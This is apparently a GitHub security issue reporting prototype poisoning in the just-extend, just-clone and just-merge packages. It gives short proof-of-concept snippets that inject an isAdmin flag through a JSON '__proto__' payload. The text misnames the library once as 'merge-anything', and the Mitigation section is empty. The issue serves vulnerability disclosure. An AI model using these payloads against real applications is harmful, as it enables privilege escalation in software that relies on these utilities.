angus-c / just

A library of dependency-free JavaScript utilities that do just one thing.
https://anguscroll.com/just
MIT License
6k stars 209 forks

Security: Prototype poisoning in just-extend, just-clone, just-merge #579

Open xclow3n opened 3 months ago

xclow3n commented 3 months ago

POC:

import extend from 'just-extend';

// Trusted defaults for a user
const defaultPermissions = {
    read: true,
    write: false,
    delete: false,
};

// Attacker-controlled JSON: the own "__proto__" key survives JSON.parse
const payload = JSON.parse('{"__proto__": { "isAdmin": true }}');

// Merging the payload writes "isAdmin" through the __proto__ setter
const userPermissions = extend({}, defaultPermissions, payload);

console.log('User Permissions:', userPermissions);
console.log(userPermissions['isAdmin']);

if (userPermissions.isAdmin) {
    console.log('User has admin access');
} else {
    console.log('User does not have admin access');
}

This code demonstrates how prototype poisoning can occur by merging an object containing a __proto__ property with default permissions using the merge-anything library. The isAdmin property is injected into the object's prototype.

Mitigation

Since this library has a lot of weekly downloads, there might be multiple use cases that might be affected by this bug.

xclow3n commented 3 months ago

just-clone is also vulnerable to the same thing.

import clone from 'just-clone';

// Own "__proto__" key from untrusted JSON
var obj = JSON.parse('{"__proto__":{"isAdmin":true}}');
// The clone copies the key by assignment, so it hits the __proto__ setter
var objClone = clone(obj);

console.log(objClone.isAdmin);

just-merge POC:

import merge from 'just-merge';

// Own "__proto__" key from untrusted JSON
var payload = JSON.parse('{"__proto__":{"isAdmin":true}}');

// Merging into a fresh object sets "isAdmin" on its prototype
const extended = merge({}, payload);

console.log(extended.isAdmin);